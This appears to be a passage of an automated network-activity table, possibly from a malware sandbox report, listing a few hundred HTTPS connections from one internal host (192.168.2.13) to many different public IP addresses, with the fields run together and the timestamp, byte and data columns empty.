                                        15494192.168.2.1356496151.138.143.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15495192.168.2.134989067.51.67.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15496192.168.2.1335978183.149.158.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15497192.168.2.133632489.125.44.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15498192.168.2.135665089.96.67.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15499192.168.2.1358406148.188.46.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15500192.168.2.135907872.113.161.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15501192.168.2.1355900106.55.76.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15502192.168.2.1344340165.21.96.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15503192.168.2.1346976163.171.176.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15504192.168.2.136094294.19.129.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15505192.168.2.1358198144.28.144.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15506192.168.2.1342526171.164.226.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15507192.168.2.135501873.20.248.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15508192.168.2.1344122113.127.220.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15509192.168.2.133544447.125.227.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15510192.168.2.134505018.15.175.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15511192.168.2.133587074.146.8.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15512192.168.2.1336720161.88.93.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15513192.168.2.1338158191.173.190.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15514192.168.2.133292014.12.130.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15515192.168.2.13421261.132.231.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15516192.168.2.134885694.46.35.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15517192.168.2.1351372105.28.81.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15518192.168.2.134677647.53.86.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15519192.168.2.13447188.165.116.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15520192.168.2.1355992183.154.227.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15521192.168.2.135560440.117.136.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15522192.168.2.1335440206.220.69.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15523192.168.2.134518075.67.186.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15524192.168.2.1342318106.156.144.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15525192.168.2.135187839.127.239.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15526192.168.2.1343386219.166.102.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15527192.168.2.134179640.213.177.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15528192.168.2.1345620207.203.24.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15529192.168.2.134107618.31.75.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15530192.168.2.1358434173.133.39.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15531192.168.2.1356658131.148.212.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15532192.168.2.1347222152.41.241.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15533192.168.2.1344918202.99.159.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15534192.168.2.134844482.165.102.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15535192.168.2.134611460.180.66.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15536192.168.2.1349096183.25.82.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15537192.168.2.1339414154.177.209.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15538192.168.2.1333690153.237.202.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15539192.168.2.1352784139.231.209.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15540192.168.2.134292288.53.230.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15541192.168.2.1348166144.154.56.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15542192.168.2.133588023.121.63.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15543192.168.2.1353708222.243.234.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15544192.168.2.1354624151.125.6.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15545192.168.2.135990618.136.239.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15546192.168.2.1334640134.175.105.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15547192.168.2.1353502199.146.106.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15548192.168.2.1355444107.46.24.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15549192.168.2.1337618107.177.78.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15550192.168.2.135811048.142.146.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15551192.168.2.1349342170.65.198.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15552192.168.2.1338596191.224.49.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15553192.168.2.1347336146.30.120.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15554192.168.2.13573444.202.214.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15555192.168.2.1334928188.148.219.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15556192.168.2.134141038.179.101.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15557192.168.2.1358406210.156.216.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15558192.168.2.1340584173.169.108.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15559192.168.2.1336622203.113.202.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15560192.168.2.1344010208.122.190.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15561192.168.2.1346968187.206.254.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15562192.168.2.1342086198.83.59.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15563192.168.2.1352830142.88.37.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15564192.168.2.134961677.137.202.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15565192.168.2.135279674.196.58.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15566192.168.2.135433220.80.135.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15567192.168.2.1337508160.244.217.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15568192.168.2.135058645.237.194.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15569192.168.2.133967483.205.46.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15570192.168.2.1357498105.13.11.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15571192.168.2.1357076181.66.186.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15572192.168.2.135601671.92.198.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15573192.168.2.1344526176.118.29.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15574192.168.2.1343330118.48.130.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15575192.168.2.135929059.0.167.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15576192.168.2.1343702161.167.65.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15577192.168.2.1345382201.71.123.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15578192.168.2.134823220.210.66.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15579192.168.2.1354196129.115.52.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15580192.168.2.1354900177.188.76.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15581192.168.2.135254296.33.203.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15582192.168.2.1358732155.216.71.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15583192.168.2.133538017.161.25.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15584192.168.2.134038214.230.208.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15585192.168.2.135685859.137.243.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15586192.168.2.135685473.138.14.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15587192.168.2.133920414.49.183.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15588192.168.2.1350698159.197.157.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15589192.168.2.133789678.27.30.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15590192.168.2.1358000213.143.78.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15591192.168.2.1346000111.191.131.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15592192.168.2.133525465.36.75.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15593192.168.2.1359728206.145.206.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15594192.168.2.1338628216.75.125.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15595192.168.2.1333582160.79.105.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15596192.168.2.136090435.184.172.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15597192.168.2.134406057.235.183.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15598192.168.2.1336292199.167.76.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15599192.168.2.133849845.128.17.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15600192.168.2.133851284.46.14.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15601192.168.2.1336972146.253.187.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15602192.168.2.1356944144.48.94.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15603192.168.2.135305023.131.93.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15604192.168.2.1360146128.151.40.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15605192.168.2.135169619.123.189.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15606192.168.2.1341918163.243.90.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15607192.168.2.1351768148.54.165.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15608192.168.2.1338538101.99.176.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15609192.168.2.133850453.59.217.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15610192.168.2.133934413.18.98.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15611192.168.2.134390688.212.140.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15612192.168.2.1342760153.189.92.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15613192.168.2.134112250.108.233.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15614192.168.2.1356154154.169.50.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15615192.168.2.1354090110.9.145.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15616192.168.2.1338894132.215.218.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15617192.168.2.1348650178.4.98.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15618192.168.2.1332898111.247.156.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15619192.168.2.135692868.187.78.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15620192.168.2.1358052174.130.186.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15621192.168.2.135449224.107.143.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15622192.168.2.1344670200.155.239.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15623192.168.2.133660439.132.164.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15624192.168.2.135529813.65.182.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15625192.168.2.135748031.8.11.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15626192.168.2.135867618.137.224.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15627192.168.2.1333806194.67.172.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15628192.168.2.1357936110.165.246.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15629192.168.2.1357198107.171.181.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15630192.168.2.1347550152.146.137.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15631192.168.2.1336458143.61.211.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15632192.168.2.135185231.16.223.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15633192.168.2.135453020.247.77.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15634192.168.2.1355484203.25.84.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15635192.168.2.1351946221.7.38.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15636192.168.2.1358256132.160.130.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15637192.168.2.1337084123.237.176.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15638192.168.2.1349650153.174.169.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15639192.168.2.133446068.45.3.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15640192.168.2.1342334216.141.170.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15641192.168.2.1344564108.211.206.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15642192.168.2.1347896137.119.247.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15643192.168.2.1341022154.20.139.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15644192.168.2.1355604101.24.66.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15645192.168.2.1352720168.98.202.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15646192.168.2.133732657.170.92.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15647192.168.2.133623871.206.193.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15648192.168.2.1347328196.224.232.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15649192.168.2.1334822219.56.216.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15650192.168.2.1343012126.92.144.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15651192.168.2.135699893.63.130.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15652192.168.2.1334782156.208.236.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15653192.168.2.1345676158.254.36.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15654192.168.2.135268471.87.210.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15655192.168.2.135884093.251.88.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15656192.168.2.136098887.133.54.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15657192.168.2.136042440.230.60.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15658192.168.2.135547478.11.46.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15659192.168.2.1359296104.234.85.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15660192.168.2.1345992124.186.101.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15661192.168.2.133550490.91.64.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15662192.168.2.135222465.232.69.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15663192.168.2.1358644179.195.168.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15664192.168.2.133642285.95.120.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15665192.168.2.134222244.102.54.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15666192.168.2.134108018.200.90.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15667192.168.2.1333104200.27.209.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15668192.168.2.135267666.91.154.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15669192.168.2.1353574174.229.165.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15670192.168.2.1355746194.152.46.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15671192.168.2.1335150138.3.211.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15672192.168.2.1345700143.232.5.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15673192.168.2.1334234193.240.85.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15674192.168.2.134407668.143.210.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15675192.168.2.1360086145.81.129.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15676192.168.2.135708075.101.144.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15677192.168.2.1357506204.43.68.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15678192.168.2.1332946187.137.67.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15679192.168.2.1339234185.204.215.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15680192.168.2.1342218206.87.97.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15681192.168.2.134971276.230.76.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15682192.168.2.134753287.206.204.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15683192.168.2.133305612.48.175.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15684192.168.2.1346412148.121.149.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15685192.168.2.134414074.218.217.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15686192.168.2.1333968180.91.73.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15687192.168.2.134351819.146.211.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15688192.168.2.1345744147.220.50.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15689192.168.2.1350778184.101.217.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15690192.168.2.1342178162.245.194.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15691192.168.2.134754635.198.163.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15692192.168.2.133640275.48.43.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15693192.168.2.1340188102.211.2.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15694192.168.2.1338796206.25.7.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15695192.168.2.1356938203.3.106.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15696192.168.2.1359188120.201.102.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15697192.168.2.134911019.118.170.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15698192.168.2.136051042.80.120.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15699192.168.2.1343982128.61.17.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15700192.168.2.134148269.213.8.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15701192.168.2.1359850116.209.118.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15702192.168.2.135339036.40.255.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15703192.168.2.134479662.188.24.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15704192.168.2.133535299.79.127.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15705192.168.2.135713642.110.211.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15706192.168.2.1346738164.190.149.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15707192.168.2.135618896.39.91.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15708192.168.2.1334074221.149.101.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15709192.168.2.135313051.211.248.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15710192.168.2.135306294.185.152.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15711192.168.2.1345866166.168.62.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15712192.168.2.1357950136.248.67.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15713192.168.2.1354834155.215.29.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15714192.168.2.1355132109.128.236.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15715192.168.2.1333792196.61.113.148443
                                        TimestampBytes transferredDirectionData


